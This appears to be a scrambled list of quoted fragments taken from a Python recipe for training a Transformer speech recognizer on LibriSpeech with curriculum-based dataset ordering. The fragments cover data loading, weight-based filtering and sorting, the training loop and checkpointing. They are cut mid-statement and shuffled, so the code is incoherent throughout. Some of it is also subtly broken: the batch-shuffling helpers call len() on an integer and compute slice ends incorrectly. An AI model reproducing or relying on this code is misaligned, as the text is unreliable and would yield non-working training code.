is", "dataset batch_size : 8, int Used to divide the dataset into batches. This", "recipe, do the following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With", "be accessible via an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts :", "a filtered and/or sorted version of this based on specified curriculum, shares static", "in minutes, default: ``15.0``. If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer", "tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos", ") # # when sorting do not shuffle in dataloader ! otherwise is", "[] for i, data_id in enumerate(weights.keys()): if select_n is not None and len(filtered_ids)", "with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for batch in", "# number of epochs for which curriculum must be used is defined if", "probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos #", "= -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\":", "# Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to 0 each", "static data. The reason to implement these operations in the same method is", "len(train_set) if progressbar is None: progressbar = not self.noprogressbar # Iterate epochs for", "in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids +=", "summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations", "* ``evaluate_batch()`` * ``update_average()`` If the initialization was done with distributed_count > 0", "processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0 # Validation stage", "outputs hyps = None if stage == sb.Stage.TRAIN: hyps = None elif stage", "in test_datasets.items()] # We get the tokenizer as we need it to encode", "debug (bool) If ``True``, this will only iterate a few batches for all", "defines the data processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data", "performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. Activate it only", "these weight(s) will be used to sort the dataset. ordering_info : str Information", "\") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of", "`max_value`)\"\"\" if min_value == None and max_value == None: return weights if isinstance(min_value,int):", "have the optimizer added to continue training if interrupted. inter_epoch_dataset_updation : bool Whether", "Training is performed on the full LibriSpeech dataset (960 h). The best model", "return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch =", "main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug", "max_weight : None, int If not None, will only keep data_point if weight[data_point]", ") # # print(train_data) # train_set = make_dataloader( # valid_data , # stage", "functools import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core", "self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage ==", "LibriSpeech dataset (960 h). The best model is the average of the checkpoints", "key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order # If comparison using", "not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach()", "max_weight weights : None, dict Map from data_id to weight, these weight(s) will", "The neural network is trained on both CTC and negative-log likelihood targets and", "be updated, the following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments", "off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount of time between saving", "limit: continue return False for key, func in key_test.items(): if bool(func(computed[key])): continue return", "is defined if self.sortagrad < epoch: # recreate dataset using random shuffling return", "== \"contiguous\": pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection", "function definition). By default, this will be passed all modules in ``modules`` at", "this will only iterate a few batches for all datasets, to ensure code", "stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False if", "(if train_set is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are", ") elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file,", "**train_loader_kwargs ) if valid_set is not None and not ( isinstance(valid_set, DataLoader) or", "sort training data to speed up training and get better results. # train_data", "all valid. progressbar : bool Whether to display the progress of each epoch", "In order to use the ``fit()`` method, one should sub-class the ``Brain`` class", "# 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], )", "summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation", "3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def", "len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)):", "or in dynamic items) to limit, will only keep data_point if data_point[key] >=", "# Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\",", "should return an integer indicating the epoch count. train_set : Dataset, DataLoader A", "[wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy", "to `make_dataloader()` for making the valid_loader (if valid_set is a Dataset, not DataLoader).", "saving intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive, these are not saved.", "the valid_loader (if valid_set is a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader", "test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) )", "if progressbar is None: progressbar = not self.noprogressbar # Iterate epochs for epoch", "both CTC and negative-log likelihood targets and sub-word units estimated with Byte Pairwise", "if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad():", "the epoch count. train_set : Dataset, DataLoader A set of data to use", "self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or stage", "# if so change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions =", "be used is defined if self.sortagrad < epoch: # recreate dataset using random", "if self.sortagrad < epoch: # recreate dataset using random shuffling return else: return", "result if res == 0: continue else: return res return res shuffled_data_ids =", "string as input and creates a dictionary out of it\"\"\" ordering_info = []", "meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the", "points as equal, continue # comparing using the next key, else return the", "the dataset into batches of size `batch_size` and order these batches randomly to", "recreate dataset using preferred cl approach return else: # recreate dataset using preferred", ": iterable Each call should return an integer indicating the epoch count. train_set", "before stopping. Default: ``3``. noprogressbar (bool) Whether to turn off progressbar when training.", "Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int)", "import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler", "one of random, sorted, weighted_sorted.\" ) # create Dataloader using the weights filtered_sorted_ids", "keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def", "hyps ] target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words)", "on the first n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset", "def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad(): predictions =", "== sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0", "protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech) from librispeech_prepare import prepare_librispeech", "#!/usr/bin/env python3 \"\"\"Recipe for training a Transformer ASR system with librispeech. The system", "Transformer ASR system with librispeech. The system employs an encoder, a decoder, and", "self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: # gradient clipping & early stop", "= sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id] = index return", "the static data, but has its own output keys and dynamic items (initially", "the optimizer if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self,", "be used in the brain class. It also defines the data processing pipeline", "but only on the first n data points found. Meant for debugging. Returns", "to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words", "# anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self,", "torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens", "behavior does not match the use case. For a simple use case (e.g.,", "this value. Default: ``5``. nonfinite_patience (int) Number of times to ignore non-finite losses", "to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad", "in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1 loss = self.evaluate_batch(batch,", "tup[2] for tup in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\"", "only perform beamsearch with limited capacity # and no LM to give user", "results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle in", "dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] ==", "the ``fit()`` method. This behavior can be changed by overriding the ``configure_optimizers()`` method.", "compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain multiple keys Note: Value and", "self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos,", ") ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams):", "): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN,", "key, limit in key_min_value.items(): if computed[key] >= limit: continue return False for key,", "tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys(", "return -1 else: return 0 def _output_length_comparator( self, key1, key2 ): \"\"\"Compare two", "speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time def make_dataloader( dataset, stage,", "is used within the overridden methods. These will be accessible via an ``hparams``", "flexible enough to support a large variety of different systems. By properly changing", "found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has", "the existence of multiple functions that can (or should) be overridden. The following", "of a epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage", "valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides =", "loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch):", "if hparams[\"sorting\"] == \"ascending\": # # we sort training data to speed up", "or partial function definition). By default, this will be passed all modules in", "tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on", "self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights =", "is a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid.", "for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count))", "only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, )", "the beginning of the ``fit()`` method. This behavior can be changed by overriding", "be jit compiled. distributed_count (int) Number of devices to run on. distributed_backend (str)", "between epochs or not. It is used in CL which takes feedback from", "\"\"\"Checks if the data example fulfills the filtering criteria\"\"\" for key, limit in", "within the overridden methods. These will be accessible via an ``hparams`` attribute, using", "batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and", "hparams[\"skip_prep\"], }, ) # here we create the datasets objects as well as", "Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the dataset", "-1 else: return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data", "stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at end-of-epoch if stage", "``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int) Number of times", "& early stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal", "accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq", "Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`, `alphabetic` - Options for", "if they have trainable parameters, and will have ``train()``/``eval()`` called on them. opt_class", "keys Note: Value and its meaning * 1 - key1 > key2 *", "expensive, and this way the filtering and sorting steps don't need to compute", "hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size", "method, one should sub-class the ``Brain`` class and override any methods for which", "not. It is used in CL which takes feedback from model and reshuffles", "current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps", "\"\"\"Recipe for training a Transformer ASR system with librispeech. The system employs an", "weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: # Create", "of epochs for which curriculum must be used is defined if self.sortagrad <", "interrupted if self.checkpointer is not None: # do not reload the weights if", "Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0", "audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)", "\"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__ ==", "data to speed up training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\")", "stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if", "progressbar is None: progressbar = not self.noprogressbar # Iterate epochs for epoch in", "index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data", "is used to handle , whether the dataset needs to be reshuffled at", "p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage == sb.Stage.TRAIN:", "epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats(", "epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a", "the list of parameters (e.g. a lambda or partial function definition). By default,", "# Only run validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end,", "order # If comparison using `key` returned data points as equal, continue #", "in weights.items(): if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and value", "epochs to run in debug mode, Default ``2``. If a non-positive number is", "`weights` is None batch_selection : str Information on how to order batches. -", "return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of each", "the evaluation stage # delete the rest of the intermediate checkpoints # ACC", "tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download", "False # elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True", "will only keep data_point if bool(func(data_point[key])) == True min_weight : None, int If", "the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc,", "epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs for", "Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs :", "False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids", "data to use for validation. If a Dataset is given, a DataLoader is", "Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\" - After", "# Time since last intra-epoch checkpoint last_ckpt_time = time.time() # Only show progressbar", "== sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current", "self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss", "is performed with (CTC/Att joint) beamsearch coupled with a neural language model. To", "== \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif", "orderings = dataset_order.split(\",\") for order in orderings: if order.strip() == '': continue column,order", "str:torch.nn.Module pairs These modules are passed to the optimizer by default if they", "self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: # for the sake of efficiency,", "if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens", "Default: ``3``. noprogressbar (bool) Whether to turn off progressbar when training. Default: ``False``.", "Note: This is used only if `weights` is None batch_selection : str Information", ") return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={}", "in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute the accuracy of the one-step-forward prediction", "sb.utils.distributed.if_main_process(): # report different epoch stages according current stage current_epoch = self.hparams.epoch_counter.current if", "not None, will only keep data_point if weight[data_point] < max_weight weights : None,", "end of a epoch. This is used to handle , whether the dataset", "index,id in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self, key1, key2", "if data_point[key] >= limit key_max_value : dict Map from key (in data or", "weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\": pass elif batch_selection ==", "modules : dict of str:torch.nn.Module pairs These modules are passed to the optimizer", "if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens", "loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a single", "continue return False for key, func in key_test.items(): if bool(func(computed[key])): continue return False", "data_id in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if", "# Compute outputs hyps = None if stage == sb.Stage.TRAIN: hyps = None", "and self.step == self.debug_batches: break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss,", "stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode only runs a", "predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize", "Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data", "method is that computing some dynamic items may be expensive, and this way", "to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how", "is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1", "gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation == 0: # gradient", "employs an encoder, a decoder, and an attention mechanism between them. Decoding is", "the overridden methods. These will be accessible via an ``hparams`` attribute, using \"dot\"", "given, a DataLoader is automatically created. If a DataLoader is given, it is", "objective. Relies on the existence of multiple functions that can (or should) be", "checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called", "\"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A set of options to change", "mixed-precision is used. Activate it only with cuda. max_grad_norm (float) Default implementation of", "Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions,", "DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs : dict Kwargs", "Whether to display the progress of each epoch in a progressbar. \"\"\" if", "total_steps = len(train_set) if progressbar is None: progressbar = not self.noprogressbar # Iterate", "a checkpoint on the main process. Arguments --------- epoch_counter : iterable Each call", "self.switched = True def on_fit_start(self): \"\"\"Initialize the right optimizer on the training start\"\"\"", "= True def on_fit_start(self): \"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start()", "to limit, will only keep data_point if data_point[key] <= limit key_test : dict", "weighted_sorted.\" ) # create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight,", "tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID)", "* <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME> 2021 \"\"\"", "list of data ids, filtered and sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks", "num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with", "test_datasets, tokenizer = dataio_prepare(hparams) # # We download the pretrained LM from HuggingFace", "overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If", "\"sorted\": if weights == None: # Create dataset using ordering info weights =", "epoch stages according current stage current_epoch = self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr", "ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random", "n filtered data_points. The possible sorting is applied, but only on the first", "train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides", "tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost(", "if __name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file)", "shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\"", "hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: #", "\"\"\"Returns a list of data ids, filtered and sorted using custom weights\"\"\" def", "= {} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches(", "= None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: # for", "optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__", "stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch", "on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) #", "at batch level. select_n : None, int If not None, only keep (at", "random, sorted, weighted_sorted.\" ) # create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids(", "The best model is the average of the checkpoints from last 5 epochs.", "and self.step == self.debug_batches: break if ( self.checkpointer is not None and self.ckpt_interval_minutes", "== None: return weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value =", "weights : None, dict Map from data_id to weight, these weight(s) will be", "specified curriculum, shares static data. The reason to implement these operations in the", "> max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value) filtered_ids = [] for i,", "batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index", "or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data =", ") datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()] #", "@sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define", "print(train_data) # train_set = make_dataloader( # valid_data , # stage = Stage.TRAIN, #", "p_ctc, p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL)", "processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( #", "hparams[\"sorting\"] == \"ascending\": # # we sort training data to speed up training", "key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids, fulfilling the filtering", "**loader_kwargs ) return dataloader class CurriculumOrientedDynamicDataset(DynamicItemDataset): def curriculum_based_filtered_sorted( self, key_min_value={}, key_max_value={}, key_test={}, min_weight=None,", "(in data or in dynamic items) to limit, will only keep data_point if", "data or in dynamic items) to limit, will only keep data_point if data_point[key]", ", \"OOPS!! Batchwise shuffling gone wrong.\" weights = {} for index,data_id in enumerate(shuffled_data_ids):", "and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ):", "== sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src =", "few batches if self.debug and self.step == self.debug_batches: break if ( self.checkpointer is", "with a Transformer language model is used on the top of decoder probabilities.", "stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,)", "and many other possible variations. Authors * <NAME> 2020 * <NAME> 2020 *", "- self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval", "Number of batches to run in debug mode, Default ``2``. debug_epochs (int) Number", "key_min_value, key_max_value, key_test) # order entire dataset if ordering_type == \"random\": weights =", "+ [i for k, i in test_datasets.items()] # We get the tokenizer as", "self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage", "order entire dataset if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type ==", "we sort training data to speed up training and get better results. #", "csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} )", "open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create", "can be overridden: * ``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict of", "valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss", "< key2 * 0 - key1 = key2 \"\"\" for ordering in dataset_orderings:", "keys( and/or methods) and their order. - Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for", "if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value in", "``modules`` that should be jit compiled. distributed_count (int) Number of devices to run", "cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default:", "meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch", "in orderings: if order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info", "do not shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False #", "datasets to improve objective. Relies on the existence of multiple functions that can", "the data example has weight within the range (`min_value`, `max_value`)\"\"\" if min_value ==", "select_n is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [", "not in group: return 